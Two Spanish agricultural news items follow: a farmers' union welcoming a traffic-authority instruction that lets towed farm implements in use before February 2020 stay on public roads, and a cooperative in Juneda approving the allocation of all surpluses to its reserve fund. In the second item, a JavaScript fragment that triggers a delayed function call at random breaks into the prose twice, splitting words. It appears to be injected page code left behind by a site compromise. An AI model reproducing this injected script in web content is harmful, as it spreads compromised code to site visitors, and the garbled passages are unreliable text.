Los arreos remolcados puestos en funcionamiento antes del 21 de febrero de 2020 podrán seguir circulando por la vía pública

Unió de Pagesos, celebra la decisión del Gobierno de permitir que los arreos remolcados puestos en funcionamiento antes del 21 de febrero del año 2020 puedan seguir circulando sin problemas por la vía pública, tal y como venía reivindicando el sindicato. Esta decisión llega después de numerosas reuniones de UP con los Ministerios de Agricultura, de Industria y de Interior con el fin de exponer la problemática que suponía esta prohibición para el campo profesional, a raíz de la Instrucción 20 / V -139 de la Dirección General de Tráfico (DGT) de 21 de febrero de 2020. por ello, Unió de Pagesos valora positivamente este gesto y pide a las administraciones que hayan sancionado agricultores para circular con arreos remolcados de antes de la fecha marcada que actúen de oficio y retiren las sanciones impuestas o, en caso de que se hayan abonado las multas, que en devuelvan el importe a los afectados.

El gobierno central y la DGT crearon un grupo de trabajo para sustituir la Instrucción 20 / V – 139 para adecuar la definición de todo a la normativa europea para la Instrucción MOV / 4-21, que permite que los arreos remolcados adquiridos y puestos en funcionamiento antes del 21 de febrero de 2020 puedan seguir circulando siempre que su titular aporte la factura de compra, si la conserva, y una declaración responsable de acuerdo con el anexo I de la Instrucción MOV / 4-21. Los aperos posteriores a esa fecha deben estar homologados de acuerdo al Reglamento (UE) 167/2013 y matriculados de acuerdo al RD 2822/1998, de 23 de diciembre por el que se aprueba el Reglamento General de Vehículos. La maquinaria no matriculada, no podrá circular por las vías abiertas al tráfico y sólo podrá ser transportada por otros vehículos.

El 21 de febrero de 2020, la DGT publicó la citada Instrucción 20 / V – 139 según la cual todos los arreos remolcados pasaban a ser considerados como vehículos al ser considerados equipamientos intercambiables remolcados, de acuerdo con el reglamento europeo relativo a la homologación de vehículos agrícolas o forestales y en la vigilancia del mercado de estos vehículos. Esto implicaba que los arreos remolcados pasaban a tener la obligación de inscribirse en el Registro Oficial de Maquinaria Agrícola (ROMA), estar homologados y matriculados, disponer de un seguro obligatorio y pasar la ITV para poder circular por la vía pública. Esta medida afectaba directamente un gran número de maquinaria agrícola, una parte de la cual ya no podría ser homologada, debido al incremento de los requisitos de los registros de homologación establecidos por la UE a partir de 2017. Según datos propios, esta instrucción dejaba sin poder circular legalmente entre el 30 y el 40% de la maquinaria agrícola que se usa para preparar el terreno y labrar todo el Estado.

Los socios de GAP Cooperativa aprueban, por unanimidad, destinar todos los excedentes anuales al fondo de reserva

El pasado martes 29 de junio los socios y socias de GAP Cooperativa se reunieron en la pista Parque Alegría de Juneda para celebrar su Asamblea General Ordinaria, que transcurrió sin incidencias y donde se aprobaron, por unanimidad, los diferentes puntos del orden del día sometidos a votación.

Tras más de un año sin realizar ningún encuentro de manera presencial, el pasado martes 29 el conjunto de socios y socias de GAP Cooperativa tuvieron la oportunidad de reencontrarse, siguiendo todas las medidas de seguridad derivadas de la Covid-19 , de manera presencial con motivo de la celebración de la Asamblea General Ordinaria. A pesar de las restricciones, todo el mundo agradeció este encuentro y la oportunidad de intercambiar opiniones fuera de las pantallas de ordenadores y otros aplicativos tecnológicos. El espacio escogido para la celebración de esta asamblea fue la pista Parque Alegría, un luga emblemático en Juneda.

En el transcurso del encuentro, Eduard Cau, presidente de GAP Cooperativa, así como Mónica Jiménez, gerente de la entidad, expusieron a los asistentes los diferentes puntos del orden del día como el informe y examen de la gestión social, el balance de situación, la cuenta de pérdidas y ganancias de la memoria económica del ejercicio cerrado de 2020, presupuestos para el 2021, etc. que se aprobaron sin ningún voto en contra ni comentario al respecto.

Uno de los aspectos más destacados de esta asamblea estuvo relacionado con la aplicación de los resultados. En este sentido, todos los presentes aprobaron de manera unánime la propuesta de la Junta Directiva de GAP Cooperativa, encabezada por Eduard Cau, de asignar la totalidad de los posibles excedentes anuales al fondo de reserva. Cabe recordar, que de forma obligatoria, por el tipo de ente jurídico, las cooperativas tienen la obligación de aplicar un 30% de los posibles excedentes anuales al fondo de reserva; pero el conjunto de asociados de GAP SCCL dio el visto bueno a la propuesta de la Junta de GAP de dedicar la totalidad de los excedentes anuales al fondo de reserva, dandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando así una nueva muestra de su compromiso con la cooperativa y sus proyectos, que en buena medida revierten en beneficio de la comarca y en la defensa del correcto desarrollo de la actividad ganadera. Como muestra de este compromiso, también se aprobó una modificación de los estatutos de la cooperativa para recoger esta decisión de la asamblea de destinar la totalidad de los excedentes anuales al fondo de reserva.

La parte final de la Asamblea se dedicó a explicar el estado actual del proyecto Nueva Tracjusa a raíz de la comunicación el pasado mes de marzo por parte de la Generalidad de Cataluña, después de 5 largos años de tramitaciones, de la resolución definitiva con la autorización para el proyecto de Nueva Tracjusa avalandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ando su viabilidad medioambiental, que permitirá sustituir la actual fuente de calor para el secado del purín, ahora con gas natural, por un gas de síntesis obtenido a partir de la gasificación de los residuos sólidos urbanos (RSU) una vez higienizados y estabilizados. En este sentido, a pesar de las acciones en contra del proyecto protagonizadas por algunos colectivos, el presidente de la cooperativa se mostró moderadamente optimista, al respecto de una resolución final positiva para el proyecto.

Antes de finalizar el encuentro, con el turno abierto de palabras, Eduard Cau, explicó a los asistentes diferentes aspectos vinculados con la Fundación Ara Garrigues, impulsada por GAP Cooperativa. Entre otros, hizo mención sobre la incorporación de diferentes patrones a la Fundación y de la compra, por parte de GAP Cooperativa, de un inmueble en Juneda que hará las veces de sede de esta fundación, que tiene como principal objetivo apoyar proyectos de carácter empresarial, innovación e investigación desarrollados en las Garrigues.